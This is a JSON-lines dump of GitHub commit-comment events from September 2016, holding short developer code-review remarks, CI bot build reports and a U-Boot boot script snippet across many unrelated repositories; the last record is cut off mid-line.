{"id":"4534481100","type":"CommitCommentEvent","actor":{"login":"jflasher"},"repo":{"name":"ropenscilabs/ropenaq"},"payload":{"comment":{"id":18946018,"position":null,"line":null,"path":null,"commit_id":"2c7d7a26172988ded7e12ab8dbc349da4fe475f7","created_at":"2016-09-08T14:44:34Z","updated_at":"2016-09-08T14:44:34Z","body":":+1:"}},"created_at":"2016-09-08T14:44:34Z"}
{"id":"4534490153","type":"CommitCommentEvent","actor":{"login":"SeregaGit"},"repo":{"name":"SeregaGit/Work_with_tables"},"payload":{"comment":{"id":18946038,"position":null,"line":null,"path":null,"commit_id":"fb25a2cc3c0cf3a06197092cefcadaddc7180630","created_at":"2016-09-08T14:45:55Z","updated_at":"2016-09-08T14:45:55Z","body":"w"}},"created_at":"2016-09-08T14:45:55Z"}
{"id":"4534493775","type":"CommitCommentEvent","actor":{"login":"sez11a"},"repo":{"name":"sez11a/liferay-docs"},"payload":{"comment":{"id":18946044,"position":29,"line":52,"path":"discover/deployment/articles/03-maintaining-liferay/liferay-enterprise-search/01-configuring-elasticsearch.markdown","commit_id":"663a297a7758f49bd02e776549285ab5b3317590","created_at":"2016-09-08T14:46:28Z","updated_at":"2016-09-08T14:46:28Z","body":"Yeah, along with the footnote I added in case there are readers who never heard of Boaty McBoatface. :-) "}},"created_at":"2016-09-08T14:46:28Z"}
{"id":"4534498168","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18946057,"position":null,"line":null,"path":null,"commit_id":"83ac84976eff9eefffb595daec7bf06b099d55c8","created_at":"2016-09-08T14:47:07Z","updated_at":"2016-09-08T14:47:07Z","body":"This was an unusual commit log entry. I performed the following. I also verified I performed the steps by looking through Bash history.\r\n\r\n```\r\ngit checkout master\r\n<merge master into all dev-branches>\r\ngit merge hmqv\r\n```\r\n\r\nI don't see the merge message for HMQV → Master. I'm not sure where it went...."}},"created_at":"2016-09-08T14:47:07Z"}
{"id":"4534498260","type":"CommitCommentEvent","actor":{"login":"mikedurbin"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18946059,"position":23,"line":23,"path":"fcrepo-import-export-common/src/main/java/org/fcrepo/importexport/AuthorizationRequiredRuntimeException.java","commit_id":"93cf3ee0273bf14500b8fcf0729f2f2fca6bb9cb","created_at":"2016-09-08T14:47:08Z","updated_at":"2016-09-08T14:47:08Z","body":"The spec calls 401 \"Unauthorized\".  I was going to call it UnauthorizedRuntimeException but that seemed to be speaking about the exception itself.\r\n\r\nI'll issue an update momentarily."}},"created_at":"2016-09-08T14:47:08Z"}
{"id":"4534498291","type":"CommitCommentEvent","actor":{"login":"masalmon"},"repo":{"name":"ropenscilabs/ropenaq"},"payload":{"comment":{"id":18946060,"position":null,"line":null,"path":null,"commit_id":"2c7d7a26172988ded7e12ab8dbc349da4fe475f7","created_at":"2016-09-08T14:47:08Z","updated_at":"2016-09-08T14:47:08Z","body":"@jflasher thanks for confirming I got the links right :smile_cat: "}},"created_at":"2016-09-08T14:47:08Z"}
{"id":"4534508427","type":"CommitCommentEvent","actor":{"login":"otacke"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":18946076,"position":27,"line":205,"path":"scripts/interactive-video.js","commit_id":"014a46173eaa49bd0d9e53891060eb21ad7cb3ad","created_at":"2016-09-08T14:48:39Z","updated_at":"2016-09-08T14:48:39Z","body":"It's the same implementation as in self.video.on('qualityChange', function (event) {}) - I just mimicked the code. Does the problem occur there as well?"}},"created_at":"2016-09-08T14:48:39Z"}
{"id":"4534508720","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18946078,"position":23,"line":23,"path":"fcrepo-import-export-common/src/main/java/org/fcrepo/importexport/AuthorizationRequiredRuntimeException.java","commit_id":"93cf3ee0273bf14500b8fcf0729f2f2fca6bb9cb","created_at":"2016-09-08T14:48:42Z","updated_at":"2016-09-08T14:48:42Z","body":"Yeah, the spec is annoying. In the end, what matters most is that we have types for all these things as soon as possible, and we can rename them as is meet."}},"created_at":"2016-09-08T14:48:42Z"}
{"id":"4534508750","type":"CommitCommentEvent","actor":{"login":"150balbes"},"repo":{"name":"kszaq/LibreELEC.tv"},"payload":{"comment":{"id":18946079,"position":null,"line":null,"path":null,"commit_id":"d130ae04222640f4178001e4e655bb16b3c8b9dd","created_at":"2016-09-08T14:48:43Z","updated_at":"2016-09-08T14:48:43Z","body":"It is better to use this option the content for this script :\r\n\r\n\r\n```\r\nif test ${bootfromnand} = 1; then setenv bootfromnand 0; saveenv; run storeboot; fi\r\nsetenv sddtb 'if fatload mmc 0 ${dtb_mem_addr} dtb.img; then echo sd dtb.img loaded; else store dtb read $dtb_mem_addr; fi'\r\nsetenv usbdtb 'if fatload usb 0 ${dtb_mem_addr} dtb.img; then echo usb dtb.img loaded; else store dtb read $dtb_mem_addr; fi'\r\nsetenv librefromsd 'if mmcinfo; then if fatload mmc 0 ${loadaddr} kernel.img; then run sddtb; setenv bootargs ${bootargs} bootfromsd; wipeisb; bootm; fi; fi'\r\nsetenv librefromusb 'if usb start 0; then if fatload usb 0 ${loadaddr} kernel.img; then run usbdtb; setenv bootargs ${bootargs} bootfromusb; wipeisb; bootm; fi; fi'\r\nrun librefromsd\r\nrun librefromusb\r\n\r\n\r\n```"}},"created_at":"2016-09-08T14:48:43Z"}
{"id":"4534509848","type":"CommitCommentEvent","actor":{"login":"ijokarumawak"},"repo":{"name":"mcgilman/nifi"},"payload":{"comment":{"id":18946081,"position":28,"line":139,"path":"nifi-nar-bundles/nifi-framework-bundle/nifi-framework/nifi-web/nifi-web-api/src/main/java/org/apache/nifi/web/api/DataTransferResource.java","commit_id":"b97714a4839c7c2536b0426b53e3f67858b89c5e","created_at":"2016-09-08T14:48:52Z","updated_at":"2016-09-08T14:48:52Z","body":"I agree to avoid casting. How about exposing checkUserAuthorization method instead of RootGroupPort instance? Maybe we could wrap it in authorize() method."}},"created_at":"2016-09-08T14:48:52Z"}
{"id":"4534510920","type":"CommitCommentEvent","actor":{"login":"mcgilman"},"repo":{"name":"mcgilman/nifi"},"payload":{"comment":{"id":18946083,"position":34,"line":143,"path":"nifi-nar-bundles/nifi-framework-bundle/nifi-framework/nifi-web/nifi-web-api/src/main/java/org/apache/nifi/web/api/DataTransferResource.java","commit_id":"b97714a4839c7c2536b0426b53e3f67858b89c5e","created_at":"2016-09-08T14:49:02Z","updated_at":"2016-09-08T14:49:02Z","body":"No authorization happens in any of these instances. All authorization happens in the Authorizer. The purpose of the AuthorizableLookup is to provide/protect access to the components necessary to initiate the authorization."}},"created_at":"2016-09-08T14:49:02Z"}
{"id":"4534516615","type":"CommitCommentEvent","actor":{"login":"Nigeltiany"},"repo":{"name":"klarkc/polymer-loopback-starter-kit"},"payload":{"comment":{"id":18946098,"position":null,"line":null,"path":null,"commit_id":"662ac70082b5bb06e44bb8fe1f0f52605a2af2a0","created_at":"2016-09-08T14:49:51Z","updated_at":"2016-09-08T14:49:51Z","body":"```javascript\r\n// Build lbclient browser bundle\r\ngulp.task('lbclient', function (done) {\r\n    var b = browserify({\r\n        basedir: path.resolve(rootPath, 'client/loopback')\r\n    });\r\n    b.require(path.resolve(rootPath, 'client/loopback/index.js'), {\r\n        expose: 'envoy-client'\r\n    });\r\n```\r\n```javascript\r\nPolymer({\r\n          is: 'home-page',\r\n          ready: function () {\r\n            /**\r\n             * Browserify errors prevent calling the api directly\r\n             */\r\n            var app = require('envoy-client');\r\n            var User = app.models.account;\r\n            console.log(User);\r\n```"}},"created_at":"2016-09-08T14:49:51Z"}
{"id":"4534516623","type":"CommitCommentEvent","actor":{"login":"kelunik"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":18946099,"position":null,"line":null,"path":null,"commit_id":"aa9d0b990e335f945355b5c8251d82a0aab78d48","created_at":"2016-09-08T14:49:51Z","updated_at":"2016-09-08T14:49:51Z","body":"Users shouldn't set a loop error handler IMO. Aerys should do that and provide a way to map exceptions to error responses."}},"created_at":"2016-09-08T14:49:51Z"}
{"id":"4534517080","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18946101,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T14:49:56Z","updated_at":"2016-09-08T14:49:56Z","body":"В общем, не допилил метод. \r\nОстановился на таком варианте\r\n```\tdef show_stations\r\n\t\t\t@full_route.select{|station| @trains_on_station[self.Train]}\r\n\tend\r\n```\r\n\r\nЯ предполагаю, что этот метод делает следующее:\r\n1. Проходится по массиву `full_route`\r\n2. Если встречает станцию, на которой есть поезд (т.е. `self.Train` объект), то выводит эту станцию\r\nНаличие поезда на странции проверяется условием` @trains_on_station[self.Train]`\r\n\r\nГде я ошибся?"}},"created_at":"2016-09-08T14:49:56Z"}
{"id":"4534520309","type":"CommitCommentEvent","actor":{"login":"benjaminoakes"},"repo":{"name":"ContinuityControl/dotfiles"},"payload":{"comment":{"id":18946104,"position":4,"line":11,"path":"home/.gitconfig.d/shared","commit_id":"5c8fc96b52c7ca05b6af7133f036b0a10501f59d","created_at":"2016-09-08T14:50:26Z","updated_at":"2016-09-08T14:50:26Z","body":"Ooh!  I like it.  Just a preview of review comments:  It would be best to replace `develop` with reading the `git flow` configuration like we did in another recent PR."}},"created_at":"2016-09-08T14:50:26Z"}
{"id":"4534524324","type":"CommitCommentEvent","actor":{"login":"MarekKoszalka"},"repo":{"name":"MarekKoszalka/MMM-projekt"},"payload":{"comment":{"id":18946109,"position":6,"line":6,"path":"VoltageSource.java","commit_id":"f28f42f85cccc0050320fa04728e8e736ded66cb","created_at":"2016-09-08T14:51:01Z","updated_at":"2016-09-08T14:51:01Z","body":"fsdsdfdsfdsfds"}},"created_at":"2016-09-08T14:51:01Z"}
{"id":"4534530815","type":"CommitCommentEvent","actor":{"login":"bwoebi"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":18946117,"position":null,"line":null,"path":null,"commit_id":"aa9d0b990e335f945355b5c8251d82a0aab78d48","created_at":"2016-09-08T14:51:58Z","updated_at":"2016-09-08T14:51:58Z","body":"@kelunik That's what I meant, Aerys should set one and adequately log etc."}},"created_at":"2016-09-08T14:51:58Z"}
{"id":"4534531020","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18946119,"position":null,"line":null,"path":null,"commit_id":"8d0e592e531686dccd172cfee82bd7577859e147","created_at":"2016-09-08T14:51:59Z","updated_at":"2016-09-08T14:51:59Z","body":"FixAgainCentroidForNonConvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.99%25-green.svg)</a>\n"}},"created_at":"2016-09-08T14:51:59Z"}
{"id":"4534532985","type":"CommitCommentEvent","actor":{"login":"23535348"},"repo":{"name":"acampos1916/runrewards"},"payload":{"comment":{"id":18946124,"position":null,"line":null,"path":null,"commit_id":"e1a7ed719c79ab926fcf51496beff7d994ba78b9","created_at":"2016-09-08T14:52:19Z","updated_at":"2016-09-08T14:52:19Z","body":"Tema"}},"created_at":"2016-09-08T14:52:19Z"}
{"id":"4534534042","type":"CommitCommentEvent","actor":{"login":"droserasprout"},"repo":{"name":"Mi5Devs/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18946127,"position":null,"line":null,"path":null,"commit_id":"fc689d4601ce4bcc96e25545dac65b59bea8c761","created_at":"2016-09-08T14:52:27Z","updated_at":"2016-09-08T14:52:27Z","body":"Don't get mad, I don't care that much. You  Also I've written email to license-violation@gpl-violations.org asking what can we do in this situation at 31 Aug but still no answer."}},"created_at":"2016-09-08T14:52:27Z"}
{"id":"4534534988","type":"CommitCommentEvent","actor":{"login":"Olfi01"},"repo":{"name":"Pixelmon/Pixelmon-Language"},"payload":{"comment":{"id":18946128,"position":null,"line":null,"path":null,"commit_id":"f46da7dfb74953ee81b956426ad5fc23e766aa1e","created_at":"2016-09-08T14:52:35Z","updated_at":"2016-09-08T14:52:35Z","body":"EDIT: Just tested it, seems it was too early to say \"finished\". There are some things that have to be changed, eg. some strings are just too long (both those written by me and those written by someone else). Although I will keep on helping you guys with this!"}},"created_at":"2016-09-08T14:52:35Z"}
{"id":"4534535394","type":"CommitCommentEvent","actor":{"login":"claypigyn"},"repo":{"name":"claypigyn/hello-world"},"payload":{"comment":{"id":18946130,"position":null,"line":null,"path":null,"commit_id":"460fcc81b3eaf7bbddccee3aca65ae33e0cead90","created_at":"2016-09-08T14:52:38Z","updated_at":"2016-09-08T14:52:38Z","body":"it didn't work!"}},"created_at":"2016-09-08T14:52:38Z"}
{"id":"4534535868","type":"CommitCommentEvent","actor":{"login":"mcgilman"},"repo":{"name":"mcgilman/nifi"},"payload":{"comment":{"id":18946134,"position":28,"line":139,"path":"nifi-nar-bundles/nifi-framework-bundle/nifi-framework/nifi-web/nifi-web-api/src/main/java/org/apache/nifi/web/api/DataTransferResource.java","commit_id":"b97714a4839c7c2536b0426b53e3f67858b89c5e","created_at":"2016-09-08T14:52:43Z","updated_at":"2016-09-08T14:52:43Z","body":"See my comment below about the purpose of the AuthorizableLookup. It provides/protects access to components necessary for initiating the authorization. I'm simply trying to stay consistent with what's already in place. Take a look at other existing examples like the ConnectionAuthorizable, etc."}},"created_at":"2016-09-08T14:52:43Z"}
{"id":"4534544481","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18946156,"position":null,"line":null,"path":null,"commit_id":"f7a44710fe9f18135f6bd3f15e7bdaed954c86ed","created_at":"2016-09-08T14:53:52Z","updated_at":"2016-09-08T14:53:52Z","body":"Collaborator:\nCorresponding review in collaborator has been deleted."}},"created_at":"2016-09-08T14:53:52Z"}
{"id":"4534545027","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18946157,"position":null,"line":null,"path":null,"commit_id":"a78dcd2348eb4f8ae8165da14daea7f3a2ae6e0a","created_at":"2016-09-08T14:53:57Z","updated_at":"2016-09-08T14:53:57Z","body":"Collaborator:\nCorresponding review in collaborator has been deleted."}},"created_at":"2016-09-08T14:53:57Z"}
{"id":"4534545924","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18946162,"position":null,"line":null,"path":null,"commit_id":"2cc5529379749e48e140b1a6ed05c57fc7a8ce51","created_at":"2016-09-08T14:54:05Z","updated_at":"2016-09-08T14:54:05Z","body":"Collaborator:\nCorresponding review in collaborator has been deleted."}},"created_at":"2016-09-08T14:54:05Z"}
{"id":"4534546129","type":"CommitCommentEvent","actor":{"login":"bgcngm"},"repo":{"name":"Mi5Devs/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18946163,"position":null,"line":null,"path":null,"commit_id":"fc689d4601ce4bcc96e25545dac65b59bea8c761","created_at":"2016-09-08T14:54:07Z","updated_at":"2016-09-08T14:54:07Z","body":"Don't you know? Kernel source was released today. I already forked it to Mi5Devs."}},"created_at":"2016-09-08T14:54:07Z"}
{"id":"4534546522","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18946164,"position":null,"line":null,"path":null,"commit_id":"bf0c3dfdbf980703a56a360bc3b72436965874c1","created_at":"2016-09-08T14:54:11Z","updated_at":"2016-09-08T14:54:11Z","body":"Collaborator:\nCorresponding review in collaborator has been deleted."}},"created_at":"2016-09-08T14:54:11Z"}
{"id":"4534547402","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18946166,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T14:54:19Z","updated_at":"2016-09-08T14:54:19Z","body":"The namespace solution was adopted for DDL triggers. I didn't suggested cause it's a bit weird if one tries to get something from the ERROR namespace a mispell a word, and we had SQLSTATE which is different from namespace already. Anyway, I don't object for this solution."}},"created_at":"2016-09-08T14:54:19Z"}
{"id":"4534550414","type":"CommitCommentEvent","actor":{"login":"oli-g"},"repo":{"name":"anryko/grafana-influx-dashboard"},"payload":{"comment":{"id":18946173,"position":54,"line":693,"path":"getdash.conf.js","commit_id":"d55d98ced609e1eb4e948390102528fdd15f8d9d","created_at":"2016-09-08T14:54:44Z","updated_at":"2016-09-08T14:54:44Z","body":"Can you set the usual colors?"}},"created_at":"2016-09-08T14:54:44Z"}
{"id":"4534552204","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18946181,"position":null,"line":null,"path":null,"commit_id":"8d0e592e531686dccd172cfee82bd7577859e147","created_at":"2016-09-08T14:55:01Z","updated_at":"2016-09-08T14:55:01Z","body":"FixAgainCentroidForNonConvex (JasonGlazer) - x86_64-MacOS-10.9-clang: OK (2327 of 2328 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T14:55:01Z"}
{"id":"4534552561","type":"CommitCommentEvent","actor":{"login":"mikeatlas"},"repo":{"name":"fluent/serverengine"},"payload":{"comment":{"id":18946183,"position":5,"line":20,"path":"serverengine.gemspec","commit_id":"a5883f0756b124805609037e49eedea6d4a97ee4","created_at":"2016-09-08T14:55:04Z","updated_at":"2016-09-08T14:55:04Z","body":"@tagomoris Is there a reason the `required_ruby_version` was bumped up? I'm locked in on a Ruby 1.9 environment (out of my control) and this change breaks our downstream usage of a fluent plugin:\r\n`fluent-plugin-websocket->fluentd->serverengine`"}},"created_at":"2016-09-08T14:55:04Z"}
{"id":"4534555178","type":"CommitCommentEvent","actor":{"login":"chochos"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":18946189,"position":null,"line":null,"path":null,"commit_id":"bc621b2e2c805b8b0af4fad3f2aab65f56569ba3","created_at":"2016-09-08T14:55:27Z","updated_at":"2016-09-08T14:55:27Z","body":"Excellent! But...\r\n\r\nYou should use the model loader in the js compiler, which loads the declarations from a JSON object contained in file with suffix `-model.js` that's sitting right next to the JS module. This is important because soon we're going to have those model files available for native js modules, thanks to the typescript model loader that @lucaswerkmeister is working on."}},"created_at":"2016-09-08T14:55:27Z"}
{"id":"4534555334","type":"CommitCommentEvent","actor":{"login":"michalmuskala"},"repo":{"name":"elixir-ecto/ecto"},"payload":{"comment":{"id":18946190,"position":6,"line":13,"path":"lib/ecto/query/builder/filter.ex","commit_id":"640e8f5f7f97eab68e4eebcd517803f71d90ebc1","created_at":"2016-09-08T14:55:28Z","updated_at":"2016-09-08T14:55:28Z","body":"Shouldn't this be `:and | :or`?"}},"created_at":"2016-09-08T14:55:28Z"}
{"id":"4534557887","type":"CommitCommentEvent","actor":{"login":"michalmuskala"},"repo":{"name":"elixir-ecto/ecto"},"payload":{"comment":{"id":18946194,"position":36,"line":48,"path":"lib/ecto/query/builder/filter.ex","commit_id":"640e8f5f7f97eab68e4eebcd517803f71d90ebc1","created_at":"2016-09-08T14:55:50Z","updated_at":"2016-09-08T14:55:50Z","body":"Same here"}},"created_at":"2016-09-08T14:55:50Z"}
{"id":"4534560167","type":"CommitCommentEvent","actor":{"login":"trowski"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":18946205,"position":null,"line":null,"path":null,"commit_id":"aa9d0b990e335f945355b5c8251d82a0aab78d48","created_at":"2016-09-08T14:56:11Z","updated_at":"2016-09-08T14:56:11Z","body":"Yes, Aerys should set up it's own error handler. I was speaking in more general terms, perhaps in `amphp/amp` or `amphp/loop` there should be some documentation about the loop error handler."}},"created_at":"2016-09-08T14:56:11Z"}
{"id":"4534563159","type":"CommitCommentEvent","actor":{"login":"droserasprout"},"repo":{"name":"Mi5Devs/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18946209,"position":null,"line":null,"path":null,"commit_id":"fc689d4601ce4bcc96e25545dac65b59bea8c761","created_at":"2016-09-08T14:56:34Z","updated_at":"2016-09-08T14:56:34Z","body":"Oh shi! _runnin away yellin_"}},"created_at":"2016-09-08T14:56:34Z"}
{"id":"4534563912","type":"CommitCommentEvent","actor":{"login":"mikeatlas"},"repo":{"name":"fluent/serverengine"},"payload":{"comment":{"id":18946213,"position":5,"line":20,"path":"serverengine.gemspec","commit_id":"a5883f0756b124805609037e49eedea6d4a97ee4","created_at":"2016-09-08T14:56:41Z","updated_at":"2016-09-08T14:56:41Z","body":"I see you said \"Fix required version\" in the README, but it's unclear what you fixed with the bump?"}},"created_at":"2016-09-08T14:56:41Z"}
{"id":"4534564263","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18946214,"position":43,"line":612,"path":"cura/Settings/ContainerManager.py","commit_id":"8a8b55800b905dd479848bf8a4f61a0a6d7ebd1b","created_at":"2016-09-08T14:56:43Z","updated_at":"2016-09-08T14:56:43Z","body":"Hmmm not very pretty, but wow it solves my problem with expandXML stuff ^^"}},"created_at":"2016-09-08T14:56:43Z"}
{"id":"4534564983","type":"CommitCommentEvent","actor":{"login":"davidfestal"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":18946217,"position":5,"line":224,"path":"plugin-ceylon-code/source/org/intellij/plugins/ceylon/ide/ceylonCode/model/IdeaModelLoader.ceylon","commit_id":"59205604762e7e0f61ef17e5aeaaeda687bb6e72","created_at":"2016-09-08T14:56:50Z","updated_at":"2016-09-08T14:56:50Z","body":"I'm not sure this is a sufficient fix. What if the archive file has just been modified, but not yet refreshed ? "}},"created_at":"2016-09-08T14:56:50Z"}
{"id":"4534565778","type":"CommitCommentEvent","actor":{"login":"soukakei"},"repo":{"name":"soukakei/soukakei.github.io"},"payload":{"comment":{"id":18946220,"position":null,"line":null,"path":null,"commit_id":"f6ac10f82ded9999900bc2ce6d64d66707430a49","created_at":"2016-09-08T14:56:57Z","updated_at":"2016-09-08T14:56:57Z","body":"css"}},"created_at":"2016-09-08T14:56:57Z"}
{"id":"4534568914","type":"CommitCommentEvent","actor":{"login":"ijokarumawak"},"repo":{"name":"mcgilman/nifi"},"payload":{"comment":{"id":18946225,"position":34,"line":143,"path":"nifi-nar-bundles/nifi-framework-bundle/nifi-framework/nifi-web/nifi-web-api/src/main/java/org/apache/nifi/web/api/DataTransferResource.java","commit_id":"b97714a4839c7c2536b0426b53e3f67858b89c5e","created_at":"2016-09-08T14:57:24Z","updated_at":"2016-09-08T14:57:24Z","body":"That's right, I understand. What I'm not comfortable with is that we're exposing entire RootGroupPort here. If we add RootGroupPortAuthorizable, we can expose checkUserAuthorization method only."}},"created_at":"2016-09-08T14:57:24Z"}
{"id":"4534572027","type":"CommitCommentEvent","actor":{"login":"chibatching"},"repo":{"name":"chibatching/Kotpref"},"payload":{"comment":{"id":18946232,"position":null,"line":null,"path":null,"commit_id":"143107183dc914e2a549b748b5b597ef364a659b","created_at":"2016-09-08T14:57:51Z","updated_at":"2016-09-08T14:57:51Z","body":"I think so too! I referenced this post -> https://medium.com/@andretietz/auto-initialize-your-android-library-2349daf06920#.59a1141x7\r\nYou can check more detail about this way. :D"}},"created_at":"2016-09-08T14:57:51Z"}
{"id":"4534579637","type":"CommitCommentEvent","actor":{"login":"mikeatlas"},"repo":{"name":"fluent/serverengine"},"payload":{"comment":{"id":18946246,"position":5,"line":20,"path":"serverengine.gemspec","commit_id":"a5883f0756b124805609037e49eedea6d4a97ee4","created_at":"2016-09-08T14:58:56Z","updated_at":"2016-09-08T14:58:56Z","body":"I guess I can fork the plugin and require an older version of `fluent` (0.12)..."}},"created_at":"2016-09-08T14:58:56Z"}
{"id":"4534580981","type":"CommitCommentEvent","actor":{"login":"thuyhatran"},"repo":{"name":"thuyhatran/StudentAd-Spring-Hibernate-Eclipse-Maven"},"payload":{"comment":{"id":18946250,"position":null,"line":null,"path":null,"commit_id":"da18a9c327d40d194f4b02cb67fccac67090dd37","created_at":"2016-09-08T14:59:09Z","updated_at":"2016-09-08T14:59:09Z","body":"Langague option doesn't need  spring-messaging .jar"}},"created_at":"2016-09-08T14:59:09Z"}
{"id":"4534583146","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18946254,"position":null,"line":null,"path":null,"commit_id":"e9fb9c8243a21206966465f43eed508c4a5f3873","created_at":"2016-09-08T14:59:28Z","updated_at":"2016-09-08T14:59:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 972](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12976&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-08T14:59:28Z"}
{"id":"4534584295","type":"CommitCommentEvent","actor":{"login":"tr3v0rrr"},"repo":{"name":"ainc/awesomeinc2013"},"payload":{"comment":{"id":18946256,"position":113,"line":2739,"path":"assets/css/main.css","commit_id":"f7fea5435bfd1c8c1bcb9c01630b241f2910f9c1","created_at":"2016-09-08T14:59:37Z","updated_at":"2016-09-08T14:59:37Z","body":"Hey Matt. Do you mind to remove me froM the Awesome Inc mailing list(s)? I thought I was removed a long time ago, but I guess not.\n\nThanks!\n\n> On Sep 8, 2016, at 9:51 AM, mattsmith14 <notifications@github.com> wrote:\n> \n> See #10\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-08T14:59:37Z"}
{"id":"4534584659","type":"CommitCommentEvent","actor":{"login":"Tschussi"},"repo":{"name":"Tschussi/C-Lab1"},"payload":{"comment":{"id":18946257,"position":1,"line":1,"path":"README.md","commit_id":"2d26017e5a678a59b643cb06803e5491f0e74e42","created_at":"2016-09-08T14:59:41Z","updated_at":"2016-09-08T14:59:41Z","body":"Introductory lab: finding the radius, circumferance and area of a circle given two point."}},"created_at":"2016-09-08T14:59:41Z"}
{"id":"4534584958","type":"CommitCommentEvent","actor":{"login":"polkovnikov-ph"},"repo":{"name":"google/closure-compiler-js"},"payload":{"comment":{"id":18946258,"position":null,"line":null,"path":null,"commit_id":"a557c78186f0aeb2e6600854f0a3c919fd1417f0","created_at":"2016-09-08T14:59:43Z","updated_at":"2016-09-08T14:59:43Z","body":"@samthor You forgot to publish it to `npm`."}},"created_at":"2016-09-08T14:59:43Z"}
{"id":"4534585348","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"shadowsocks/shadowsocks-libev"},"payload":{"comment":{"id":18946259,"position":18,"line":39,"path":"src/rule.h","commit_id":"d8606c53b840c85850c1d0f9f3726acf9ef499df","created_at":"2016-09-08T14:59:46Z","updated_at":"2016-09-08T14:59:46Z","body":"Are you sure this is \"pcer/pcre.h\"?"}},"created_at":"2016-09-08T14:59:46Z"}
{"id":"4534590282","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/Cer2016"},"payload":{"comment":{"id":18946276,"position":null,"line":null,"path":null,"commit_id":"f325b6c46465ba2f07f7453567ba9ecbe6743f35","created_at":"2016-09-08T15:00:33Z","updated_at":"2016-09-08T15:00:33Z","body":"[R/collect_file_esses.R:30:37:](https://github.com/richelbilderbeek/Cer2016/blob/f325b6c46465ba2f07f7453567ba9ecbe6743f35/R/collect_file_esses.R#L30) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​     pi  = rep(seq(1, n_beast_runs   ), times = n_species_trees * n_alignments),\n                                    ^\n```\n[R/collect_file_esses.R:39:1:](https://github.com/richelbilderbeek/Cer2016/blob/f325b6c46465ba2f07f7453567ba9ecbe6743f35/R/collect_file_esses.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​     sti = rep(seq(1, n_species_trees), each = n_alignments * n_beast_runs, times = 